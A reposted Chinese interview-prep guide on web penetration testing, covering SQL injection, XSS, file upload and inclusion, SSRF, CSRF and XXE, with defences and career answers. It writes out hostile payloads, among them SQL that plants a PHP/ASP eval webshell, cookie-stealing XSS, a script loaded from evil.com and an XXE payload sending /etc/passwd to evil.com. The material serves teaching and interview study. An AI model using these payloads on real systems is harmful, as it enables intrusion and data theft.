2025年滲透測試面試題總結-59(題目+回答)

安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

一、SQL注入全解

二、XSS與文件漏洞

三、服務端漏洞專題

四、職業經驗與能力評估

1、注入攻擊原理是什么?如何找注入點?如何判斷注入點?
2、注入分為幾類及提交方式是什么
3、注入攻擊一般所支持的類型有那些
4、mysql數據庫帳號和密碼存放在那個庫和表里面
5、如何尋找網站物理路徑
6、分別寫出mysql及mssql數據庫寫入webshell的方法
7、請說出mysql5.0以下與5.0以上的區別
8、sql注入對服務器文件讀寫操作需要那些條件
9、分別說出sqlmap -u -r -v -p —level —risk —tables —coiumns -T —tamper參數的含義
10、注入漏洞防范方法
11、xss攻擊原理及出現的原因
12、xss分為那幾類
13、xss的危害,可能存在的地方
14、xss漏洞測試方法
15、xss如何繞過安全防范
16、分別說出iis、apache、nginx解析漏洞原理
17、任意文件下載攻擊原理及測試方法
18、任意文件上傳漏洞分幾類,說出每類突破方法
19、分別文件包含漏洞攻擊原理及分類
20、如何快速挖包涵漏洞
21、包涵漏洞具體能做什么,怎么繞過你能說說嗎
22、ssrf漏洞攻擊原理、用途
23、說說你是如何挖掘ssrf漏洞
24、說說ssrf繞過及防范方法
25、csrf攻擊原理是什么及一般你用什么工具進行檢測
26、你是如何挖掘ssrf漏洞的及防范方法
27、說說xxe漏洞攻擊原理是什么,如何找xxe漏洞及攻擊方法
28、xxe攻擊在無回顯的時候你是如何突破的
29、你是如何防范xxe漏洞的
30、你挖洞影像最深的是什么?
31、你認為你的滲透水平在國內大概是什么水平,能給自己打多少分
32、說說你以前在你公司主要做什么安全工作?如每天、每月、每年做些什么安全工作
33、你在各大漏洞平臺挖過漏洞嗎,能說說嗎?
34、你寫過什么好的安全漏洞文章發布過嗎,是否可以說說?

一、SQL注入全解

1. 注入原理與檢測mermaid

graph LR A[用戶輸入] --> B[拼接入SQL語句] --> C[數據庫執行惡意指令] --> D[數據泄露/系統控制]
  • 找注入點:表單參數、URL參數、HTTP頭(Cookie/User-Agent)
  • 判斷方法
    • 單引號觸發報錯(' → 500錯誤)
    • 邏輯測試(id=1' and '1'='1 vs id=1' and '1'='2
    • 時間盲注(id=1; select sleep(5)--

2. 注入類型與提交方式

類型提交方式案例
聯合查詢注入GET/POST參數union select 1,@@version,3
報錯注入Cookie頭' and updatexml(1,concat(0x7e,version()),1)--
布爾盲注JSON Bodyadmin' and substr(database(),1,1)='a'--
時間盲注XML數據if(ascii(substr(user(),1,1))=114,sleep(3),0)

3. 支持的數據類型

  • 整型(id=1)、字符串(name='admin')、搜索型(%input%)、JSON/XML

4. MySQL憑據存儲位置

sql-- MySQL 5.7+ SELECT user,authentication_string FROM mysql.user; -- MySQL <5.7 SELECT user,password FROM mysql.user; 

5. 網站物理路徑獲取

  • 報錯信息(PHP錯誤日志)
  • 文件讀取漏洞(/proc/self/environ
  • 數據庫函數(@@datadir
  • 配置文件泄露(WEB-INF/web.xml

6. 數據庫寫Webshell方法

sql/* MySQL(需FILE權限)*/ SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'; /* MSSQL(需db_owner權限)*/ EXEC sp_makewebtask 'C:\inetpub\shell.asp', '<?% execute(request("cmd")) %>';

7. MySQL 5.0關鍵區別

特性5.0以下5.0以上
系統表無information_schema內置元數據表
盲注效率依賴暴力猜解可直接查詢表結構
函數支持受限豐富(如group_concat)

8. 文件讀寫條件

  • 數據庫配置
    • MySQL:secure_file_priv=空值
    • MSSQL:啟用xp_cmdshell
  • 權限:數據庫用戶需具備FILE權限(MySQL)或db_owner(MSSQL)
  • 路徑:絕對路徑且Web目錄可寫

9. SQLMap核心參數

bash-u "url" # 目標URL -r request.txt # 從文件加載HTTP請求 -v 3 # 顯示完整payload(0-6級別) -p "id" # 指定測試參數 --level 2 # 檢測深度(1-5,影響Cookie/XFF檢測) --risk 3 # 風險等級(1-3,3會觸發OR注入) --tables # 列出所有表 --columns -T users # 列出指定表字段 --tamper "space2comment" # 繞過WAF的腳本

10. 注入防御方案

  • 參數化查詢(PreparedStatement)
  • 輸入過濾(正則匹配:/[^a-z0-9]/i
  • 最小權限原則(禁用DB_FILE權限)
  • WAF規則(過濾union|select|sleep

二、XSS與文件漏洞

11. XSS原理與成因

mermaidgraph LR 用戶輸入 --> 未過濾插入頁面 --> 瀏覽器執行JS代碼 --> 劫持會話/釣魚 
  • 根本原因:未對<>'"&等字符轉義

12. XSS分類

類型觸發場景案例
反射型URL參數直接輸出http://site?search=<script>alert(1)</script>
存儲型數據庫存儲后渲染留言板插入惡意腳本
DOM型前端JS操作DOMdocument.write(location.hash)

13. XSS危害與常見位置

  • 危害:Cookie竊取、鍵盤記錄、釣魚跳轉、內網探測
  • 高發點:搜索框、評論區、用戶資料頁、HTTP頭輸出點

14. 測試方法

  • 基礎探測:<script>alert(1)</script>
  • 事件觸發:<img src=x onerror=alert(document.cookie)>
  • 外部加載:<script src=//evil.com/xss.js></script>

15. 繞過技巧

  • Unicode編碼:\u003cscript\u003e
  • 標簽屬性分割:<img """><script>alert(1)</script>
  • 利用協議:javascript:eval(alert(1))
  • SVG向量:<svg onload=alert(1)>

16. 服務器解析漏洞

服務器漏洞原理利用方式
IIS 6.0分號截斷(*.asp;.jpg上傳惡意圖片馬
Apache多后綴解析(file.php.jpg配置錯誤導致雙后綴
NginxCVE-2013-4547(a.jpg\0.php空字節截斷

17. 任意文件下載

  • 原理:未校驗文件路徑參數(如download.jsp?file=../../etc/passwd
  • 測試
    1. 遍歷路徑(....//編碼繞過)
    2. 讀取系統文件(/proc/self/cmdline

18. 文件上傳突破方法

防御方式繞過技巧
擴展名黑名單.php5 .phtml .htaccess
MIME類型檢測修改Content-Type為image/jpeg
文件頭檢查添加GIF頭(GIF89a;
內容過濾短標簽(<?=)或JS混淆

19. 文件包含漏洞

  • 原理include($_GET['file']); 未限制路徑
  • 分類
    • LFI(本地包含):包含系統文件
    • RFI(遠程包含):加載遠程惡意腳本(需allow_url_include=On

20. 快速挖掘技巧

  • 參數特征:?page=about.php
  • 日志包含:file=/var/log/apache2/access.log
  • PHP偽協議:php://filter/convert.base64-encode/resource=index.php

21. 包含漏洞利用與繞過

  • 能做什么
    • 讀取源碼(php://filter
    • 執行代碼(包含圖片馬)
    • 日志污染(User-Agent插入PHP代碼)
  • 繞過
    • 路徑截斷(/etc/passwd%00
    • 超長路徑(./././[...]/file

三、服務端漏洞專題

22. SSRF原理與用途

mermaidgraph TB 攻擊者 --> 誘使服務器請求內網資源 --> 探測內網拓撲 --> 攻擊Redis/數據庫
  • 用途
    • 內網端口掃描(http://192.168.1.1:3306
    • 云元數據竊取(169.254.169.254
    • 攻擊內網應用(Redis未授權訪問)

23. 漏洞挖掘方法

  • 參數特征:url=http://example.com
  • 協議探測:file:///etc/passwd gopher://
  • 重定向鏈:短鏈接→內網IP

24. SSRF繞過與防御

  • 繞過
    • 域名重綁定(DNS TTL=0)
    • IPv6地址([::ffff:127.0.0.1]
    • URL編碼(0x7f000001 = 127.0.0.1)
  • 防御
    • 禁用非常用協議(file/gopher)
    • 設置請求白名單

25. CSRF原理與工具

  • 原理:誘導用戶點擊惡意鏈接觸發敏感操作(如修改密碼)
  • 工具
    • Burp Suite → Generate CSRF PoC
    • CSRFTester(自動化檢測)

26. CSRF防御

  • Token驗證:表單添加隨機Token
  • SameSite Cookie:設置StrictLax
  • 二次驗證:關鍵操作需密碼確認

27. XXE漏洞攻防

  • 原理:解析惡意XML實體(<!ENTITY xxe SYSTEM "file:///etc/passwd">
  • 檢測
    • 修改Content-Type為application/xml
    • 插入測試實體(&xxe;
  • 攻擊
    • 文件讀取(SYSTEM "file://"
    • 內網探測(http://192.168.1.1

28. 無回顯XXE突破

xml<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil.com/?data=%payload;'>"> 
  • 通過DNS或HTTP請求外帶數據

29. XXE防御

  • 禁用DTD(libxml_disable_entity_loader(true);
  • 使用JSON替代XML
  • 過濾<!ENTITY關鍵詞

四、職業經驗與能力評估

30. 印象最深漏洞案例

某銀行系統邏輯漏洞:轉賬接口未校驗雙方賬戶關系,通過遍歷參數實現任意賬戶互轉,漏洞評級嚴重(SRC TOP10)

31. 滲透水平自評

國內中高級水平(75/100)

  • 優勢:熟練掌握漏洞鏈組合利用(如SSRF→Redis→RCE)
  • 不足:二進制漏洞挖掘能力待提升

32. 日常工作內容

周期工作重點
每日漏洞掃描、日志審計、應急響應
每月滲透測試報告、安全加固方案
每年紅藍對抗演練、安全架構升級

33. 漏洞平臺經歷

  • 提交平臺:補天、HackerOne、企業SRC
  • 成果:累計提交高危漏洞32個(含3個嚴重級)

34. 技術文章輸出

《基于流量特征的WAF繞過實戰》

  • 發布平臺:FreeBuf、安全客
  • 核心內容:
    1. 分塊傳輸繞過
    2. 注釋符混淆SQL語句
    3. HTTP參數污染技巧

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/95878.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/95878.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/95878.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

GPT系列--類GPT2源碼剖析

無需多言&#xff0c;大家應該都用過了&#xff0c;如今都更新到GPT-5了。1. GPT-1回到2018年的NLP&#xff0c;神仙打架&#xff0c;BERT與GPT不分先后。GPT是“Generative Pre-Training”的簡稱&#xff0c;生成式的預訓練。BERT和GPT肯定是GPT難訓練&#xff0c;引用量也是B…

這是一款沒有任何限制的免費遠程手機控制手機的軟件

這是一款沒有任何限制的免費遠程手機控制手機的軟件支持安卓和蘋果1.安裝1.1被控制端安裝airdroid1.2控制端air mirror2.登錄賬號控制端和被控制端登錄同一個賬號3.控制打開控制端軟件選擇要控制的機器直接點“遠程控制“

Observability:更智能的告警來了:更快的分診、更清晰的分組和可操作的指導

作者&#xff1a;來自 Elastic Drew Post 探索 Elastic Stack 告警的最新增強功能&#xff0c;包括改進的相關告警分組、將儀表盤鏈接到告警規則&#xff0c;以及將調查指南嵌入到告警中。 在 9.1 版本中&#xff0c;我們對告警進行了重大升級&#xff0c;幫助 SRE 和運維人員更…

數智之光燃盛景 共同富裕創豐饒

8月29日&#xff0c;2025數博會“一帶一路”國際大數據產業發展暨數智賦能新時代、共同富裕向未來的會議在貴陽國際生態會議中心隆重舉行。作為全球大數據領域的重要盛會&#xff0c;此次活動吸引了來自聯合國機構、國際組織、科研院所、知名企業等社會各界的百余位代表&#x…

【網絡編程】recv函數的本質是什么?

一、為什么說recv函數的本質是 “copy”&#xff1f; recv是用于從網絡連接&#xff08;或其他 IO 對象&#xff09;接收數據的函數&#xff0c;它的核心動作不是 “從網絡上拉取數據”&#xff0c;而是 “把已經到達內核緩沖區的數據復制到用戶程序的緩沖區”。 具體流程拆解&…

JSP程序設計之輸入/輸出對象 — out對象

目錄1、out對象概述2.實例&#xff1a;out對象方法運用輸入/輸出對象&#xff0c;可以控制頁面的輸入和輸出&#xff0c;用于訪問與所有請求和響應有關的數據&#xff0c;包括out、request和response對象。 1、out對象概述 out對象是JspWriter類的一個實例&#xff0c;是一個…

UE里為什么要有提升變量

1、為了簡潔當一個類里面的函數比較多&#xff0c;并且使用比較頻繁的時候&#xff0c;就要不斷的從這個類節點往外拉線&#xff0c;從而獲取不同的函數節點&#xff0c;這樣的藍圖就會看起來比較亂&#xff0c;這時候&#xff0c;就可以將這個常用的類提升為變量。2、為了存儲…

玩轉物聯網只需十行代碼,可它為何悄悄停止維護

文章目錄玩轉物聯網只需十行代碼&#xff0c;可它為何悄悄停止維護1 背景&#xff1a;MQTT 遇上 asyncio&#xff0c;為什么選 hbmqtt&#xff1f;2 hbmqtt 是什么&#xff1f;3 安裝&#xff1a;一行命令&#xff0c;但別裝最新4 五大核心 API&#xff1a;10 行代碼跑通發布訂…

從零開始學大模型之預訓練語言模型

預訓練語言模型 本文較長&#xff0c;建議點贊收藏&#xff0c;以免遺失。更多AI大模型開發 學習視頻/籽料/面試題 都在這>>Github<< >>Gitee<< 3.1 Encoder-only PLM 在上一章&#xff0c;我們詳細講解了給 NLP 領域帶來巨大變革注意力機制以及使用…

JMeter接口測試全流程解析

1. Jmeter的界面介紹和功能組件&#xff08;元件&#xff09;1、測試計劃&#xff1a;Jmeter的起點和容器2、線程組&#xff1a;代表一定的虛擬用戶&#xff08;一個用戶一個線程&#xff09;3、取樣器&#xff1a;發送請求的最小單元4、邏輯控制器&#xff1a;控制組件的執行順…

Effective Modern C++ 條款26:避免在通用引用上重載

在C編程中&#xff0c;函數重載是一項強大的特性&#xff0c;它允許我們為不同的參數類型提供不同的實現。然而&#xff0c;當涉及到通用引用&#xff08;universal references&#xff09;時&#xff0c;重載可能會帶來意想不到的問題。Effective Modern C的條款26明確指出&am…

OpenLayers數據源集成 -- 章節一:圖像圖層詳解

前言在前面的文章中&#xff0c;我們學習了OpenLayers的基礎控件操作。本文將深入探討OpenLayers中的圖像圖層&#xff08;ImageLayer&#xff09;功能&#xff0c;通過一個完整的示例來展示如何使用ImageArcGISRest數據源加載ArcGIS服務&#xff0c;并詳細解釋圖層配置、事件監…

通義萬相wan2.2 Fun系列--Camera鏡頭控制與lnp首尾幀視頻模型

上節內容講解了wan2.2 fun control本節內容對wan2.2 fun系列模型的camera鏡頭控制模型與lnp首尾幀視頻模型進行測試與講解。 Wan2.2-Fun-Camera-Control是阿里基于Wan2.2框架推出的圖生視頻運鏡控制模型 。它支持512、768、1024等多分辨率的視頻預測&#xff0c;以81幀、每秒16…

JavaSE 集合從入門到面試:全面解析與實戰指南

JavaSE 集合從入門到面試&#xff1a;全面解析與實戰指南 在 Java 編程中&#xff0c;集合是處理數據的核心工具&#xff0c;幾乎所有 Java 應用都會用到集合框架。從簡單的列表存儲到復雜的數據分析&#xff0c;集合框架提供了豐富的數據結構和操作方法。本文將從基礎概念到面…

自建云音樂服務器:Navidrome+cpolar讓無損音樂隨身聽

文章目錄前言1. 安裝Docker2. 創建并啟動Navidrome容器3. 公網遠程訪問本地Navidrome3.1 內網穿透工具安裝3.2 創建遠程連接公網地址3.3 使用固定公網地址遠程訪問前言 “想聽自己的無損音樂還要開會員&#xff1f;”——音樂發燒友小王的煩惱。商業音樂平臺音質壓縮&#xff…

C3P0連接池適配HGDB

文章目錄文檔用途詳細信息文檔用途 講解常用的并且需要與數據庫進行交互的開源框架C3P0&#xff0c;以及C3P0框架是如何適配HGDB的。 詳細信息 1.C3P0概述 C3P0是一個開源的JDBC連接池&#xff0c;它實現了數據源和JNDI綁定&#xff0c;支持JDBC3規范和JDBC2的標準擴展。目…

ZeroGPU Spaces 加速實踐:PyTorch 提前編譯全解析

ZeroGPU 讓任何人都能在 Hugging Face Spaces 中使用強大的 Nvidia H200 硬件&#xff0c;而不需要因為空閑流量而長期占用 GPU。 它高效、靈活&#xff0c;非常適合演示&#xff0c;不過需要注意的是&#xff0c;ZeroGPU 并不能在所有場景下完全發揮 GPU 與 CUDA 棧的全部潛能…

8.ImGui-輸入框

免責聲明&#xff1a;內容僅供學習參考&#xff0c;請合法利用知識&#xff0c;禁止進行違法犯罪活動&#xff01; 本次游戲沒法給 內容參考于&#xff1a;微塵網絡安全 上一個內容&#xff1a;7.ImGui-單選框和復選框 單行輸入框使用 ImGui::InputText()&#xff0c;下圖中…

2025年- H120-Lc28. 找出字符串中第一個匹配項的下標(數組)--Java版

1.題目2.思路 短的子串相對不變 所以我們用長的字符串去截取in個長度的子串做遍歷 如果兩者相等 返回字符串第一個匹配項的索引的下標 3.代碼實現 class Solution {public int strStr(String haystack, String needle) {int s1haystack.length();int s2needle.length();//遍歷最…

uport1100系列轉接頭,SZ系列光電編碼器RS485通信

安裝uport1100系列轉接頭驅動 &#xff1a;選擇對應自己系統內核版本的驅動。否則爆出系統內核過高過低等問題。 查看系統內核版本指令&#xff1a; uname -r #簡要 uname -a #詳細驅動下載官網&#xff1a; https://www.moxa.com.cn/support/product-support/software-and-…